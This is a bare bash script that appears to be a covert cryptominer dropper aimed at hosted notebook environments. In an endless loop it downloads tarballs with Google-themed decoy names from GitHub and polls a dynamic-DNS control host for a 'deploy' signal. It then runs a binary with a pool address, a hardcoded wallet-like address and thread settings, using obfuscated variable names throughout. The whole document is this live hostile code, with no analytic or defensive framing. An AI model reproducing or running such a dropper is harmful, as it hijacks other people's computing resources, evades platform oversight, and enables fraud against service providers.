apt-get install -y libcpprest-dev libgmp-dev libargon2-0-dev

while true
do

cd /notebooks/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/googleapps8474127412742.tar.gz
tar -xvf ./googleapps8474127412742.tar.gz

cd googleapps8474

string=$(curl http://mobile8474.hopto.org/?q=deploy)
if [[ $string == *"16384"* ]]; then

arr[0]="http://mobile8474.hopto.org/"
rand=$[$RANDOM % ${#arr[@]}]
google841212121274=${arr[$rand]}

google8412=$(curl $google841212121274 | sed "s/\s+//g")

if [[ $google8412 = "" ]]
then

timeout 8 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 18 -b 18
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

else

echo "mobile8474"

sleep 84;

fi

else

cd /notebooks/

mkdir ./google84

cd /google84/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linux84741274.tar.gz
tar -xvf ./linux84741274.tar.gz

cd googleapps8474

arr[0]="http://mobile8474.hopto.org/"
rand=$[$RANDOM % ${#arr[@]}]
google841212121274=${arr[$rand]}

google8412=$(curl $google841212121274 | sed "s/\s+//g")

if [[ $google8412 = "" ]]
then

timeout 8 ./google84121274 -p $google841212121274 -a 2XHCt5awxvHdQyNLv8DukLbCZvEv9Eckv14eQZk94dDXxT8E3chTYRfasn8kn1XcqGFuXA65Qi11do1TsK2pHCM5 -t 1 -b 1
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

else

echo "mobile8474"

sleep 84;

fi

fi

done
